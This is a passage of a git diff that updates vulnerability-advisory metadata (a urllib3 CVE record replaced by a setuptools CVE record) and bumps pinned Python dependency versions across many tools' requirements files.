"2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.1.0", - "2.2.0", - "2.2.1" - ], - "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-34jh-p97f-mpxf/GHSA-34jh-p97f-mpxf.json" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ - { - "type": "WEB", - "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf" - }, { "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6345" }, { "type": "WEB", - "url": "https://github.com/urllib3/urllib3/commit/40b6d1605814dd1db0a46e202d6e56f2e4c9a468" + "url": "https://github.com/pypa/setuptools/pull/4332" }, { "type": "WEB", - "url": "https://github.com/urllib3/urllib3/commit/accff72ecc2f6cf5a76d9570198a93ac7c90270e" + "url": "https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0" }, { "type": "PACKAGE", - "url": "https://github.com/urllib3/urllib3" + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5" } ], "database_specific": { "cwe_ids": [ - "CWE-669" + "CWE-94" ], "github_reviewed": true, - "github_reviewed_at": "2024-06-17T21:37:20Z", - "nvd_published_at": "2024-06-17T20:15:13Z", - "severity": "MODERATE" + "github_reviewed_at": "2024-07-15T16:25:38Z", + "nvd_published_at": "2024-07-15T01:15:01Z", + "severity": "HIGH" } } ], "groups": [ { "ids": [ - "GHSA-34jh-p97f-mpxf" + "GHSA-cx63-2mw6-8hw5" ], "aliases": [ - "CVE-2024-37891", - "GHSA-34jh-p97f-mpxf" + "BIT-setuptools-2024-6345", + "CVE-2024-6345", + "GHSA-cx63-2mw6-8hw5" ], - "max_severity": "4.4" + "max_severity": "8.8" } ] } diff --git a/requirements/awscli-local-requirements.txt b/requirements/awscli-local-requirements.txt index bbc80de9..f6fc9084 100644 --- a/requirements/awscli-local-requirements.txt +++ b/requirements/awscli-local-requirements.txt @@ -1,8 +1,8 @@ -boto3==1.34.128 -botocore==1.34.128 +boto3==1.35.39 +botocore==1.35.39 jmespath==1.0.1 -localstack-client==2.5 +localstack-client==2.7 python-dateutil==2.9.0.post0 -s3transfer==0.10.1 +s3transfer==0.10.3 six==1.16.0 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/cf2tf-requirements.txt b/requirements/cf2tf-requirements.txt index 3c2543f3..4444c039 100644 --- a/requirements/cf2tf-requirements.txt +++ b/requirements/cf2tf-requirements.txt @@ -1,18 +1,18 @@ cfn-flip==1.3.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 click-log==0.4.0 gitdb==4.0.11 gitpython==3.1.43 -idna==3.7 +idna==3.10 iniconfig==2.0.0 packaging==24.1 pluggy==1.5.0 -pytest==8.2.2 -pyyaml==6.0.1 -rapidfuzz==3.9.3 +pytest==8.3.3 +pyyaml==6.0.2 +rapidfuzz==3.10.0 requests==2.32.3 six==1.16.0 smmap==5.0.1 thefuzz==0.22.1 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/dolphie-requirements.txt b/requirements/dolphie-requirements.txt index d793574e..a65d94d5 100644 --- a/requirements/dolphie-requirements.txt +++ b/requirements/dolphie-requirements.txt @@ -1,4 +1,4 @@ -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 cython==3.0.11 idna==3.10 linkify-it-py==2.0.3 @@ -14,12 +14,12 @@ plotext==5.3.2 pygments==2.18.0 pymysql==1.1.1 requests==2.32.3 -rich==13.8.1 +rich==13.9.2 setuptools==75.1.0 -sqlparse==0.5.1 -textual==0.81.0 +sqlparse==0.4.4 +textual==0.56.4 textual-autocomplete==2.1.0b0 -tree-sitter==0.23.0 +tree-sitter==0.23.1 typing-extensions==4.12.2 uc-micro-py==1.0.3 urllib3==2.2.3 diff --git a/requirements/hatch-requirements.txt b/requirements/hatch-requirements.txt index bd93ce66..540a52d4 100644 --- a/requirements/hatch-requirements.txt +++ b/requirements/hatch-requirements.txt @@ -1,4 +1,4 @@ -anyio==4.6.0 +anyio==4.6.2 click==8.1.7 distlib==0.3.9 filelock==3.16.1 @@ -11,6 +11,7 @@ idna==3.10 jaraco-classes==3.4.0 jaraco-context==6.0.1 jaraco-functools==4.1.0 +jeepney==0.8.0 keyring==25.4.1 markdown-it-py==3.0.0 mdurl==0.1.2 @@ -23,11 +24,12 @@ pluggy==1.5.0 ptyprocess==0.7.0 pygments==2.18.0 rich==13.9.2 +secretstorage==3.3.3 shellingham==1.5.4 sniffio==1.3.1 tomli-w==1.1.0 tomlkit==0.13.2 -trove-classifiers==2024.9.12 +trove-classifiers==2024.10.13 userpath==1.9.2 virtualenv==20.26.6 zstandard==0.23.0 diff --git a/requirements/iconsur-requirements.txt b/requirements/iconsur-requirements.txt index c85afd18..1da30a0a 100644 --- a/requirements/iconsur-requirements.txt +++ b/requirements/iconsur-requirements.txt @@ -1,2 +1,2 @@ -pyobjc-core==10.1 -pyobjc-framework-cocoa==10.1 +pyobjc-core==10.3.1 +pyobjc-framework-cocoa==10.3.1 diff --git a/requirements/moto-requirements.txt b/requirements/moto-requirements.txt index 045db866..efe6af53 100644 --- a/requirements/moto-requirements.txt +++ b/requirements/moto-requirements.txt @@ -37,7 +37,7 @@ ply==3.11 py-partiql-parser==0.5.6 pydantic==2.9.2 pydantic-core==2.23.4 -pyparsing==3.1.4 +pyparsing==3.2.0 python-dateutil==2.9.0.post0 pyyaml==6.0.2 referencing==0.35.1 diff --git a/requirements/podman-compose-requirements.txt b/requirements/podman-compose-requirements.txt index 2521872e..25dfc49b 100644 --- a/requirements/podman-compose-requirements.txt +++ b/requirements/podman-compose-requirements.txt @@ -1,2 +1,2 @@ python-dotenv==1.0.1 -pyyaml==6.0.1 +pyyaml==6.0.2 diff --git a/requirements/policy_sentry-requirements.txt b/requirements/policy_sentry-requirements.txt index 3cf366fc..333332f5 100644 --- a/requirements/policy_sentry-requirements.txt +++ b/requirements/policy_sentry-requirements.txt @@ -1,10 +1,10 @@ beautifulsoup4==4.12.3 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 -idna==3.7 -orjson==3.10.6 -pyyaml==6.0.1 +idna==3.10 +orjson==3.10.7 +pyyaml==6.0.2 requests==2.32.3 schema==0.7.7 -soupsieve==2.5 -urllib3==2.2.2 +soupsieve==2.6 +urllib3==2.2.3 diff --git a/requirements/psutils-requirements.txt b/requirements/psutils-requirements.txt index a232e7b6..d2c52e28 100644 --- a/requirements/psutils-requirements.txt +++ b/requirements/psutils-requirements.txt @@ -1,2 +1,2 @@ -puremagic==1.27 -pypdf==4.3.1 +puremagic==1.28 +pypdf==5.0.1 diff --git a/requirements/pyqt-builder-requirements.txt b/requirements/pyqt-builder-requirements.txt index 460f189f..f93e97d0 100644 --- a/requirements/pyqt-builder-requirements.txt +++ b/requirements/pyqt-builder-requirements.txt @@ -1,3 +1,3 @@ packaging==24.1 -setuptools==70.3.0 +setuptools==75.1.0 sip==6.8.6 diff --git a/requirements/pyspelling-requirements.txt b/requirements/pyspelling-requirements.txt index 4c8f9de3..d0305471 100644 --- a/requirements/pyspelling-requirements.txt +++ b/requirements/pyspelling-requirements.txt @@ -1,10 +1,10 @@ -beautifulsoup4==4.12.2 -bracex==2.4 +beautifulsoup4==4.12.3 +bracex==2.5.post1 html5lib==1.1 -lxml==5.1.0 -markdown==3.5.2 +lxml==5.3.0 +markdown==3.7 +pyyaml==6.0.2 six==1.16.0 -soupsieve==2.5 -pyyaml==6.0.1 -wcmatch==8.5 +soupsieve==2.6 +wcmatch==10.0 webencodings==0.5.1 diff --git a/requirements/raven-requirements.txt b/requirements/raven-requirements.txt index 9d306ab9..62a38e4b 100644 --- a/requirements/raven-requirements.txt +++ b/requirements/raven-requirements.txt @@ -12,7 +12,7 @@ py2neo==2021.2.4 pygments==2.17.2 pytest==8.1.1 pytz==2023.3.post1 -pyyaml==6.0.1 +pyyaml==6.0.2 redis==5.0.3 requests==2.31.0 six==1.16.0 diff --git a/requirements/rpmspectool-requirements.txt b/requirements/rpmspectool-requirements.txt index 049b7463..f78ce1d8 100644 --- a/requirements/rpmspectool-requirements.txt +++ b/requirements/rpmspectool-requirements.txt @@ -1,2 +1,2 @@ -argcomplete==3.2.2 +argcomplete==3.5.1 pycurl==7.45.3 diff --git a/requirements/ruff-lsp-requirements.txt b/requirements/ruff-lsp-requirements.txt index 51d1fdfa..ab74d814 100644 --- a/requirements/ruff-lsp-requirements.txt +++ b/requirements/ruff-lsp-requirements.txt @@ -1,5 +1,5 @@ attrs==24.2.0 -cattrs==24.1.1 +cattrs==24.1.2 lsprotocol==2023.0.1 packaging==24.1 pygls==1.3.1 diff --git a/requirements/s3ql-requirements.txt b/requirements/s3ql-requirements.txt index 821fd228..58cb98d0 100644 --- a/requirements/s3ql-requirements.txt +++ b/requirements/s3ql-requirements.txt @@ -1,17 +1,17 @@ apsw==3.46.0.1 async-generator==1.10 -attrs==23.2.0 -cffi==1.16.0 +attrs==24.2.0 +cffi==1.17.1 defusedxml==0.7.1 dugong==3.8.2 -google-auth==2.31.0 -google-auth-oauthlib==1.2.0 -idna==3.7 +google-auth==2.35.0 +google-auth-oauthlib==1.2.1 +idna==3.10 outcome==1.3.0.post0 -pyfuse3==3.3.0 +pyfuse3==3.4.0 requests==2.32.3 setuptools==70.2.0 -trio==0.26.0 +trio==0.26.2 six==1.16.0 sniffio==1.3.1 sortedcontainers==2.4.0 diff --git a/requirements/sail-requirements.txt b/requirements/sail-requirements.txt index ea4c51cb..82a269cd 100644 --- a/requirements/sail-requirements.txt +++ b/requirements/sail-requirements.txt @@ -1,5 +1,5 @@ bcrypt==4.2.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 decorator==5.1.1 deprecated==1.2.14 @@ -9,12 +9,12 @@ idna==3.10 invoke==2.2.0 jinja2==3.1.4 jsonpickle==3.3.0 -markupsafe==2.1.5 +markupsafe==3.0.1 packaging==24.1 paramiko==3.4.0 pynacl==1.5.0 python-digitalocean==1.17.0 -pyyaml==6.0.1 +pyyaml==6.0.2 requests==2.32.3 requests-file==2.1.0 tldextract==5.1.2 diff --git a/requirements/salt-lint-requirements.txt b/requirements/salt-lint-requirements.txt index 43260867..0434384f 100644 --- a/requirements/salt-lint-requirements.txt +++ b/requirements/salt-lint-requirements.txt @@ -1,2 +1,2 @@ pathspec==0.12.1 -pyyaml==6.0.1 +pyyaml==6.0.2 diff --git a/requirements/sceptre-requirements.txt b/requirements/sceptre-requirements.txt index d27e7fe2..878e76a8 100644 --- a/requirements/sceptre-requirements.txt +++ b/requirements/sceptre-requirements.txt @@ -1,17 +1,17 @@ attrs==24.2.0 -boto3==1.35.10 -botocore==1.35.10 +boto3==1.35.39 +botocore==1.35.39 cfn-flip==1.3.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 colorama==0.4.3 deepdiff==5.8.1 deprecation==2.1.0 -idna==3.8 +idna==3.10 jinja2==3.1.4 jmespath==1.0.1 jsonschema==3.2.0 -markupsafe==2.1.5 +markupsafe==3.0.1 networkx==2.6.3 ordered-set==4.1.0 packaging==24.1 @@ -19,9 +19,9 @@ pyrsistent==0.20.0 python-dateutil==2.9.0.post0 pyyaml==6.0.2 requests==2.32.3 -s3transfer==0.10.2 +s3transfer==0.10.3 sceptre-cmd-resolver==2.0.0 sceptre-file-resolver==1.0.6 -setuptools==74.0.0 +setuptools==75.1.0 six==1.16.0 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/schemathesis-requirements.txt b/requirements/schemathesis-requirements.txt index 47ee8fd1..b1c05178 100644 --- a/requirements/schemathesis-requirements.txt +++ b/requirements/schemathesis-requirements.txt @@ -11,7 +11,7 @@ h11==0.14.0 harfile==0.3.0 httpcore==1.0.6 httpx==0.27.2 -hypothesis==6.113.0 +hypothesis==6.115.0 hypothesis-graphql==0.11.1 hypothesis-jsonschema==0.23.1 idna==3.10 @@ -48,4 +48,4 @@ uri-template==1.3.0 urllib3==2.2.3 webcolors==24.8.0 werkzeug==3.0.4 -yarl==1.14.0 +yarl==1.15.1 diff --git a/requirements/scoutsuite-requirements.txt b/requirements/scoutsuite-requirements.txt index 5d6e656c..b1719749 100644 --- a/requirements/scoutsuite-requirements.txt +++ b/requirements/scoutsuite-requirements.txt @@ -1,16 +1,16 @@ aliyun-python-sdk-actiontrail==2.2.0 -aliyun-python-sdk-core==2.15.1 -aliyun-python-sdk-ecs==4.24.73 -aliyun-python-sdk-kms==2.16.3 +aliyun-python-sdk-core==2.16.0 +aliyun-python-sdk-ecs==4.24.75 +aliyun-python-sdk-kms==2.16.5 aliyun-python-sdk-ocs==0.0.4 aliyun-python-sdk-ram==3.3.0 -aliyun-python-sdk-rds==2.7.48 +aliyun-python-sdk-rds==2.7.49 aliyun-python-sdk-sts==3.1.2 aliyun-python-sdk-vpc==3.0.45 asyncio-throttle==any.whl autocommand==2.2.2 azure-common==1.1.28 -azure-core==1.30.2 +azure-core==1.31.0 azure-identity==1.5.0 azure-mgmt-authorization==3.0.0 azure-mgmt-compute==18.2.0 @@ -25,88 +25,89 @@ azure-mgmt-security==1.0.0 azure-mgmt-sql==1.0.0 azure-mgmt-storage==17.0.0 azure-mgmt-web==1.0.0 -boto3==1.34.153 -botocore==1.34.153 -cachetools==5.4.0 -charset-normalizer==3.3.2 +boto3==1.35.39 +botocore==1.35.39 +cachetools==5.5.0 +charset-normalizer==3.4.0 cheroot==10.0.1 cherrypy==18.10.0 cherrypy-cors==1.7.0 -circuitbreaker==1.4.0 +circuitbreaker==2.0.0 coloredlogs==10.0 crcmod==1.7 deprecated==1.2.14 +durationpy==0.9 google-api-core==1.34.1 -google-api-python-client==2.139.0 -google-auth==2.32.0 +google-api-python-client==2.149.0 +google-auth==2.35.0 google-auth-httplib2==0.2.0 google-cloud-appengine-logging==1.4.5 -google-cloud-audit-log==0.2.5 -google-cloud-container==2.50.0 +google-cloud-audit-log==0.3.0 +google-cloud-container==2.52.0 google-cloud-core==2.4.1 google-cloud-iam==2.15.2 google-cloud-kms==1.3.0 -google-cloud-logging==3.11.0 +google-cloud-logging==3.11.2 google-cloud-monitoring==1.1.0 google-cloud-resource-manager==1.12.5 google-cloud-storage==2.14.0 -google-crc32c==1.5.0 -google-resumable-media==2.7.1 -googleapis-common-protos==1.63.2 +google-crc32c==1.6.0 +google-resumable-media==2.7.2 +googleapis-common-protos==1.65.0 grpc-google-iam-v1==0.12.7 -grpcio==1.65.4 +grpcio==1.66.2 grpcio-status==1.48.2 httpagentparser==1.9.5 httplib2==0.22.0 httplib2shim==0.0.3 humanfriendly==10.0 -idna==3.7 -importlib-metadata==8.0.0 -isodate==0.6.1 -jaraco-collections==5.0.1 -jaraco-context==5.3.0 -jaraco-functools==4.0.2 +idna==3.10 +importlib-metadata==8.4.0 +isodate==0.7.2 +jaraco-collections==5.1.0 +jaraco-context==6.0.1 +jaraco-functools==4.1.0 jaraco-text==4.0.0 jmespath==0.10.0 -kubernetes==30.1.0 -more-itertools==10.3.0 -msal==1.30.0 +kubernetes==31.0.0 +more-itertools==10.5.0 +msal==1.31.0 msal-extensions==0.3.1 msgraph-core==0.2.2 msrest==0.7.1 netaddr==1.3.0 oauth2client==4.1.3 oauthlib==3.2.2 -oci==2.130.0 -opentelemetry-api==1.26.0 -oss2==2.18.6 +oci==2.135.2 +opentelemetry-api==1.27.0 +oss2==2.19.0 policyuniverse==1.5.1.20231109 portalocker==2.10.1 portend==3.2.0 proto-plus==1.24.0 protobuf==3.20.3 -pyasn1==0.6.0 -pyasn1-modules==0.4.0 -pycryptodome==3.20.0 -pydo==0.4.0 +pyasn1==0.6.1 +pyasn1-modules==0.4.1 +pycryptodome==3.21.0 +pydo==0.5.0 pyjwt==2.9.0 pyopenssl==24.2.1 -pyparsing==3.1.2 +pyparsing==3.2.0 python-dateutil==2.8.0 -pytz==2024.1 -pyyaml==6.0.1 +pytz==2024.2 +pyyaml==6.0.2 requests==2.32.3 requests-oauthlib==2.0.0 rsa==4.9 -s3transfer==0.10.2 -setuptools==72.1.0 +s3transfer==0.10.3 +setuptools==75.1.0 six==1.16.0 sqlitedict==2.1.0 tempora==5.7.0 typing-extensions==4.12.2 uritemplate==4.1.1 -urllib3==2.2.2 +urllib3==2.2.3 websocket-client==1.8.0 wrapt==1.16.0 zc-lockfile==3.0.post1 -zipp==3.19.2 +zipp==3.20.2 diff --git a/requirements/scrapy-requirements.txt b/requirements/scrapy-requirements.txt index fcd165b6..b331e7f7 100644 --- a/requirements/scrapy-requirements.txt +++ b/requirements/scrapy-requirements.txt @@ -1,33 +1,32 @@ attrs==24.2.0 -automat==22.10.0 -charset-normalizer==3.3.2 +automat==24.8.1 +charset-normalizer==3.4.0 constantly==23.10.4 cssselect==1.2.0 defusedxml==0.7.1 -filelock==3.15.4 +filelock==3.16.1 hyperlink==21.0.0 -idna==3.7 +idna==3.10 incremental==24.7.2 itemadapter==0.9.0 -itemloaders==1.3.1 +itemloaders==1.3.2 jmespath==1.0.1 lxml==5.3.0 packaging==24.1 parsel==1.9.1 protego==0.3.1 -pyasn1==0.6.0 -pyasn1-modules==0.4.0 +pyasn1==0.6.1 +pyasn1-modules==0.4.1 pydispatcher==2.0.7 pyopenssl==24.2.1 queuelib==1.7.0 requests==2.32.3 requests-file==2.1.0 service-identity==24.1.0 -setuptools==72.1.0 -six==1.16.0 +setuptools==75.1.0 tldextract==5.1.2 twisted==24.7.0 typing-extensions==4.12.2 -urllib3==2.2.2 +urllib3==2.2.3 w3lib==2.2.1 -zope-interface==7.0.1 +zope-interface==7.1.0 diff --git a/requirements/search-that-hash-requirements.txt b/requirements/search-that-hash-requirements.txt index 87fba99c..feff6f85 100644 --- a/requirements/search-that-hash-requirements.txt +++ b/requirements/search-that-hash-requirements.txt @@ -1,19 +1,19 @@ appdirs==1.4.4 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==7.1.2 cloudscraper==1.2.71 colorama==0.4.6 coloredlogs==15.0.1 commonmark==0.9.1 humanfriendly==10.0 -idna==3.7 +idna==3.10 loguru==0.5.3 name-that-hash==1.10.0 pygments==2.18.0 -pyparsing==3.1.2 +pyparsing==3.2.0 requests==2.32.3 requests-toolbelt==1.0.0 rich==9.13.0 toml==0.10.2 typing-extensions==3.10.0.2 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/sherlock-requirements.txt b/requirements/sherlock-requirements.txt index c721022f..f4b79f5e 100644 --- a/requirements/sherlock-requirements.txt +++ b/requirements/sherlock-requirements.txt @@ -1,15 +1,15 @@ -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 colorama==0.4.6 et-xmlfile==1.1.0 -idna==3.7 +idna==3.10 openpyxl==3.1.5 -pandas==2.2.2 +pandas==2.2.3 pysocks==1.7.1 python-dateutil==2.9.0.post0 -pytz==2024.1 +pytz==2024.2 requests==2.32.3 requests-futures==1.0.1 six==1.16.0 stem==1.8.2 -tzdata==2024.1 -urllib3==2.2.2 +tzdata==2024.2 +urllib3==2.2.3 diff --git a/requirements/shub-requirements.txt b/requirements/shub-requirements.txt index 12ac9e3c..5e649ed8 100644 --- a/requirements/shub-requirements.txt +++ b/requirements/shub-requirements.txt @@ -1,14 +1,14 @@ -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 docker==7.1.0 -idna==3.7 +idna==3.10 packaging==24.1 -pyyaml==6.0.1 +pyyaml==6.0.2 requests==2.32.3 retrying==1.3.4 scrapinghub==2.4.0 -setuptools==70.0.0 +setuptools==75.1.0 six==1.16.0 toml==0.10.2 tqdm==4.55.1 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/shyaml-requirements.txt b/requirements/shyaml-requirements.txt index cf39afa6..aa4d4d06 100644 --- a/requirements/shyaml-requirements.txt +++ b/requirements/shyaml-requirements.txt @@ -1 +1 @@ -pyyaml==6.0.1 +pyyaml==6.0.2 diff --git a/requirements/sickchill-requirements.txt b/requirements/sickchill-requirements.txt index 42154a06..1cdfcd05 100644 --- a/requirements/sickchill-requirements.txt +++ b/requirements/sickchill-requirements.txt @@ -1,67 +1,68 @@ appdirs==1.4.4 -babelfish==0.6.0 +babelfish==0.6.1 beautifulsoup4==4.12.3 beekeeper-alt==2022.9.3 bencode-py==4.0.0 cachecontrol==0.14.0 chardet==5.2.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 cinemagoer==2023.5.1 click==8.1.7 -configobj==5.0.8 +configobj==5.0.9 decorator==5.1.1 deluge-client==1.10.2 -dogpile-cache==1.3.2 +dogpile-cache==1.3.3 enzyme==0.4.1 future==1.0.0 gntp==1.0.3 -greenlet==3.0.3 +greenlet==3.1.1 guessit==3.8.0 -idna==3.6 +idna==3.10 ifaddr==0.2.0 imagesize==1.4.1 ipaddress==1.0.23 -jsonrpclib-pelix==0.4.3.2 +jsonrpclib-pelix==0.4.3.3 kodipydent-alt==2022.9.3 -lxml==5.1.0 -mako==1.3.2 -markdown2==2.4.13 -markupsafe==2.1.5 -msgpack==1.0.8 +lxml==5.3.0 +mako==1.3.5 +markdown2==2.5.1 +markupsafe==3.0.1 +msgpack==1.1.0 new-rtorrent-python==1.0.1a0 oauthlib==3.2.2 packaging==23.2 -pbr==6.0.0 -profilehooks==1.12.0 +pbr==6.1.0 +profilehooks==1.13.0 putio-py==8.7.0 +pycparser==2.22 pynma==1.0 -pyopenssl==24.0.0 +pyopenssl==24.2.1 pysrt==1.1.2 python-dateutil==2.9.0.post0 python-slugify==8.0.4 python-twitter==3.5 python3-fanart==2.0.0 -pytz==2024.1 -qbittorrent-api==2024.2.59 -rarfile==4.1 +pytz==2024.2 +qbittorrent-api==2024.9.67 +rarfile==4.2 rebulk==3.2.0 -requests==2.31.0 -requests-oauthlib==1.3.1 -send2trash==1.8.2 +requests==2.32.3 +requests-oauthlib==2.0.0 +send2trash==1.8.3 setuptools==69.1.1 six==1.16.0 -soupsieve==2.5 -sqlalchemy==2.0.27 -stevedore==5.2.0 +soupsieve==2.6 +sqlalchemy==2.0.35 +stevedore==5.3.0 subliminal==2.1.0 text-unidecode==1.3 tmdbsimple==2.9.1 -tornado==6.4 +tornado==6.4.1 tus-py==1.3.4 tvdbsimple==1.0.6 -typing-extensions==4.10.0 +typing-extensions==4.12.2 unidecode==1.3.8 -urllib3==2.2.1 +urllib3==2.2.3 validators==0.22.0 win-inet-pton==1.1.0 -xmltodict==0.13.0 +xmltodict==0.14.1 diff --git a/requirements/sigma-cli-requirements.txt b/requirements/sigma-cli-requirements.txt index b7d8cf68..71870b9a 100644 --- a/requirements/sigma-cli-requirements.txt +++ b/requirements/sigma-cli-requirements.txt @@ -1,15 +1,15 @@ -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 colorama==0.4.6 -idna==3.7 +idna==3.10 jinja2==3.1.4 -markupsafe==2.1.5 -packaging==23.2 -prettytable==3.10.0 -pyparsing==3.1.2 -pysigma==0.11.8 +markupsafe==3.0.1 +packaging==24.1 +prettytable==3.11.0 +pyparsing==3.1.4 +pysigma==0.11.14 pysigma-backend-sqlite==0.1.2 -pyyaml==6.0.1 +pyyaml==6.0.2 requests==2.32.3 -urllib3==2.2.2 +urllib3==2.2.3 wcwidth==0.2.13 diff --git a/requirements/sip-requirements.txt b/requirements/sip-requirements.txt index e8df54a2..b86740bc 100644 --- a/requirements/sip-requirements.txt +++ b/requirements/sip-requirements.txt @@ -1,2 +1,2 @@ packaging==24.1 -setuptools==70.3.0 +setuptools==75.1.0 diff --git a/requirements/slither-analyzer-requirements.txt b/requirements/slither-analyzer-requirements.txt index 0159b593..10afcd36 100644 --- a/requirements/slither-analyzer-requirements.txt +++ b/requirements/slither-analyzer-requirements.txt @@ -1,13 +1,13 @@ -aiohappyeyeballs==2.4.0 -aiohttp==3.10.5 +aiohappyeyeballs==2.4.3 +aiohttp==3.10.10 aiosignal==1.3.1 attrs==24.2.0 -bitarray==2.9.2 -cbor2==5.6.4 -charset-normalizer==3.3.2 +bitarray==2.9.3 +cbor2==5.6.5 +charset-normalizer==3.4.0 ckzg==1.0.2 crytic-compile==0.3.7 -cytoolz==0.12.3 +cytoolz==1.0.0 eth-abi==5.1.0 eth-account==0.11.3 eth-hash==0.7.0 @@ -20,14 +20,15 @@ frozenlist==1.4.1 hexbytes==0.3.1 idna==3.10 jsonschema==4.23.0 -jsonschema-specifications==2023.12.1 +jsonschema-specifications==2024.10.1 lru-dict==1.2.0 multidict==6.1.0 packaging==24.1 parsimonious==0.10.0 prettytable==3.11.0 +propcache==0.2.0 protobuf==5.28.2 -pycryptodome==3.20.0 +pycryptodome==3.21.0 pyunormalize==16.0.0 referencing==0.35.1 regex==2024.9.11 @@ -35,10 +36,10 @@ requests==2.32.3 rlp==4.0.1 rpds-py==0.20.0 solc-select==1.0.4 -toolz==0.12.1 +toolz==1.0.0 typing-extensions==4.12.2 urllib3==2.2.3 wcwidth==0.2.13 web3==6.20.3 websockets==13.1 -yarl==1.12.1 +yarl==1.15.2 diff --git a/requirements/snakemake-requirements.txt b/requirements/snakemake-requirements.txt index 8fe9a8b2..bbfbccbc 100644 --- a/requirements/snakemake-requirements.txt +++ b/requirements/snakemake-requirements.txt @@ -24,7 +24,7 @@ packaging==24.1 plac==1.4.3 platformdirs==4.3.6 psutil==6.0.0 -pulp==2.8.0 +pulp==2.9.0 pyyaml==6.0.2 referencing==0.35.1 requests==2.32.3 @@ -38,7 +38,6 @@ snakemake-interface-report-plugins==1.1.0 snakemake-interface-storage-plugins==3.3.0 tabulate==0.9.0 throttler==1.2.2 -toposort==1.10 traitlets==5.14.3 urllib3==2.2.3 wrapt==1.16.0 diff --git a/requirements/subliminal-requirements.txt b/requirements/subliminal-requirements.txt index 8b67e390..31af0d52 100644 --- a/requirements/subliminal-requirements.txt +++ b/requirements/subliminal-requirements.txt @@ -1,24 +1,24 @@ babelfish==0.6.1 beautifulsoup4==4.12.3 chardet==5.2.0 -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 click-option-group==0.5.6 decorator==5.1.1 dogpile-cache==1.3.3 enzyme==0.5.2 guessit==3.8.0 -idna==3.7 -pbr==6.0.0 -platformdirs==4.2.2 -pysubs2==1.7.2 +idna==3.10 +pbr==6.1.0 +platformdirs==4.3.6 +pysubs2==1.7.3 python-dateutil==2.9.0.post0 rarfile==4.2 rebulk==3.2.0 requests==2.32.3 six==1.16.0 -soupsieve==2.5 +soupsieve==2.6 srt==3.5.3 -stevedore==5.2.0 -tomli==2.0.1 -urllib3==2.2.2 +stevedore==5.3.0 +tomli==2.0.2 +urllib3==2.2.3 diff --git a/requirements/suricata-requirements.txt b/requirements/suricata-requirements.txt index cf39afa6..aa4d4d06 100644 --- a/requirements/suricata-requirements.txt +++ b/requirements/suricata-requirements.txt @@ -1 +1 @@ -pyyaml==6.0.1 +pyyaml==6.0.2 diff --git a/requirements/svtplay-dl-requirements.txt b/requirements/svtplay-dl-requirements.txt index fc900948..7e1e6478 100644 --- a/requirements/svtplay-dl-requirements.txt +++ b/requirements/svtplay-dl-requirements.txt @@ -1,6 +1,6 @@ -charset-normalizer==3.3.2 -idna==3.7 +charset-normalizer==3.4.0 +idna==3.10 pysocks==1.7.1 -pyyaml==6.0.1 +pyyaml==6.0.2 requests==2.32.3 -urllib3==2.2.2 +urllib3==2.2.3 diff --git a/requirements/sysaidmin-requirements.txt b/requirements/sysaidmin-requirements.txt index a0d6a5e9..c4a257f4 100644 --- a/requirements/sysaidmin-requirements.txt +++ b/requirements/sysaidmin-requirements.txt @@ -1,14 +1,14 @@ annotated-types==0.7.0 -anyio==4.4.0 +anyio==4.6.1 distro==1.9.0 h11==0.14.0 -httpcore==1.0.5 +httpcore==1.0.6 httpx==0.27.2 -idna==3.8 -jiter==0.5.0 -openai==1.43.0 -pydantic==2.8.2 -pydantic-core==2.20.1 +idna==3.10 +jiter==0.6.1 +openai==1.51.2 +pydantic==2.9.2 +pydantic-core==2.23.4 sniffio==1.3.1 tqdm==4.66.5 typing-extensions==4.12.2 diff --git a/requirements/tarsnapper-requirements.txt b/requirements/tarsnapper-requirements.txt index a36c3920..c45022ce 100644 --- a/requirements/tarsnapper-requirements.txt +++ b/requirements/tarsnapper-requirements.txt @@ -1,5 +1,5 @@ pexpect==4.9.0 ptyprocess==0.7.0 python-dateutil==2.9.0.post0 -pyyaml==6.0.1 +pyyaml==6.0.2 six==1.16.0 diff --git a/requirements/tccutil-requirements.txt b/requirements/tccutil-requirements.txt index 14666103..bcbe01ab 100644 --- a/requirements/tccutil-requirements.txt +++ b/requirements/tccutil-requirements.txt @@ -1 +1 @@ -packaging==24.0 +packaging==24.1 diff --git a/requirements/tern-requirements.txt b/requirements/tern-requirements.txt index 16969850..fb06f4e6 100644 --- a/requirements/tern-requirements.txt +++ b/requirements/tern-requirements.txt @@ -13,12 +13,12 @@ packageurl-python==0.11.1 packaging==23.2 pbr==5.11.1 prettytable==3.8.0 +pyyaml==6.0.2 regex==2023.6.3 requests==2.31.0 setuptools==69.1.1 smmap==5.0.0 stevedore==5.1.0 -pyyaml==6.0.1 urllib3==2.0.3 wcwidth==0.2.6 websocket-client==1.6.1 diff --git 